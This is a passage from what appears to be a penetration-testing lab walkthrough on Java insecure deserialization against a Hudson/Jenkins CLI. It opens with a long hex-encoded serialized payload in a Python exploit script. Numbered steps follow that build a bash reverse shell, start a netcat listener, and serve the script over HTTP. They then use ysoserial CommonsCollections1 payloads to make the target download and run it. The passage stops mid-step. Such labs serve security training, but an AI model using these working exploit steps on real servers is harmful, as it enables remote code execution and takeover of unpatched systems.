\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\nprint 'sending payload...'\n'''outf = open('payload.tmp','w')\noutf.write(payload)\noutf.close()'''\nsock.send(payload)</code></pre></p>\n<p><strong>Step 5:</strong> Create a reverse shell payload.</p>\n<p>Copy and paste the command into a file and save it as <strong>shell.sh</strong>.</p>\n<p><strong>Syntax:</strong> bash -i &gt;&amp; /dev/tcp/&lt;lhost&gt;/&lt;lport&gt; 0&gt;&amp;1</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>bash -i &gt;&amp; /dev/tcp/192.24.161.2/9999 0&gt;&amp;1</code></pre></p>\n<p><strong>Step 6:</strong> Setup a Netcat listener that will be listening for connections on port 9999.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>nc -lvp 9999</code></pre>\n<img alt=\"4\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/4.png\" /></p>\n<p><strong>Step 7:</strong> Host the shell.sh file using a Python SimpleHTTPServer. In the same directory where the file is present, execute the below.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python -m SimpleHTTPServer 8888</code></pre>\n<img alt=\"5\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/5.png\" /></p>\n<p><strong>Step 8:</strong> Generate a payload with a <strong>ysoserial</strong> file and make the target machine download the shell.sh file from attacker machine.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"curl http://192.24.161.2:8888/shell.sh -o /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"6\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/6.png\" /></p>\n<p><strong>Step 9:</strong> Execute the python exploit code.</p>\n<p><strong>Usage:</strong> python exploit.py  &lt;host&gt; &lt;port&gt; &lt;/path/to/payload&gt;</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"7\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/7.png\" /></p>\n<p>This result from the python server shows that shell.sh file is downloaded by the target machine, and the payload is working as expected.</p>\n<p><img alt=\"8\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/8.png\" /></p>\n<p>We have to run the python exploit two more times to execute the bash script in the target machine.</p>\n<p><strong>Step 10:</strong> Generate a payload again for making the downloaded shell.sh file executable.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>java -jar ~/Desktop/tools/ysoserial/ysoserial-master-SNAPSHOT.jar CommonsCollections1 \"chmod +x /tmp/shell.sh\" &gt; /root/payload.out</code></pre>\n<img alt=\"9\" src=\"https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/9.png\" /></p>\n<p><strong>Step 11:</strong> Execute the python code again to send the payload for making shell.sh file executable.</p>\n<p><strong>Command:</strong>\n<pre class=\"codehilite\"><code>python exploit.py 192.24.161.3 8080 /root/payload.out</code></pre>\n<img alt=\"10\" 